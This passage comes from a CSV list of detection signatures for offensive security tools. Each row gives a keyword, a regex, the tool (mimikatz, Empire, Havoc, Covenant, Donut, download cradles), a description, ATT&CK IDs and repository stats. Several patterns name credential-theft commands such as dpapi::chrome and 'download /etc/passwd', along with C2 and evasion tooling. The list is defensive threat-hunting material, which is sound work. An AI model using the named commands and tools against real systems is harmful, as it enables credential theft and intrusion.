A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dos-over-tor*",".{0,1000}dos\-over\-tor.{0,1000}","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. 
Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","26","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z" "*dothatlsassthing*",".{0,1000}dothatlsassthing.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*dotnet ./Server.dll*",".{0,1000}dotnet\s\.\/Server\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dotnet inline-execute *",".{0,1000}dotnet\sinline\-execute\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*dotnet Inveigh.dll*",".{0,1000}dotnet\sInveigh\.dll.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*dotnet ParseMalleable/ParseMalleable.dll*",".{0,1000}dotnet\sParseMalleable\/ParseMalleable\.dll.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*dotnet_serve_payload*",".{0,1000}dotnet_serve_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*DotNet2JSImplant*",".{0,1000}DotNet2JSImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*DotNetArtifactGenerator.py*",".{0,1000}DotNetArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*DoubleAgent.sln*",".{0,1000}DoubleAgent\.sln.{0,1000}","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. 
the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1211","417","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z" "*DoUCMe-main\*",".{0,1000}DoUCMe\-main\\.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*douknowwhoami?d*",".{0,1000}douknowwhoami\?d.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*download 
*bloodhound*",".{0,1000}download\s.{0,1000}bloodhound.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*download *Roaming\mRemoteNG\confCons.xml*",".{0,1000}download\s.{0,1000}Roaming\\mRemoteNG\\confCons\.xml.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*download /etc/passwd*",".{0,1000}download\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*download.weakpass.com/*",".{0,1000}download\.weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Download:Cradle.js*",".{0,1000}Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create 
new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*Download_Cradles.*",".{0,1000}Download_Cradles\..{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*Download_Execute*",".{0,1000}Download_Execute.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Download-Cradles.cmd*",".{0,1000}Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*downloadexec_UACbypass.lua*",".{0,1000}downloadexec_UACbypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*Download-Execute-PS*",".{0,1000}Download\-Execute\-PS.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*DownloadFileImplant*",".{0,1000}DownloadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Downloading */*.tar to /tmp/*.pak*",".{0,1000}Downloading\s.{0,1000}\/.{0,1000}\.tar\sto\s\/tmp\/.{0,1000}\.pak.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*Downloading original SCNotification.exe.config via SMB*",".{0,1000}Downloading\soriginal\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*downloadMalwareDomains*",".{0,1000}downloadMalwareDomains.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and 
Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*downloads/wapiti-code*",".{0,1000}downloads\/wapiti\-code.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*downloadshellcodebin.c*",".{0,1000}downloadshellcodebin\.c.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*downloadshellcodebin.exe*",".{0,1000}downloadshellcodebin\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*DownloadString*https://checkip.amazonaws.com*",".{0,1000}DownloadString.{0,1000}https\:\/\/checkip\.amazonaws\.com.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*",".{0,1000}\-dP\s\-eP\s\-rS\s\-cF\s\-pS\s\-tO\s\-gW\s\-\-httpx\s\-\-dnsprobe\s\s\-aI\swebanalyze\s\-sS.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a 
subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*dpapi.py*",".{0,1000}dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dpapi/decryptor.py*",".{0,1000}dpapi\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*dpapi::blob*",".{0,1000}dpapi\:\:blob.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cache*",".{0,1000}dpapi\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::capi*",".{0,1000}dpapi\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::chrome*",".{0,1000}dpapi\:\:chrome.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cloudapkd*",".{0,1000}dpapi\:\:cloudapkd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cloudapreg*",".{0,1000}dpapi\:\:cloudapreg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cng*",".{0,1000}dpapi\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
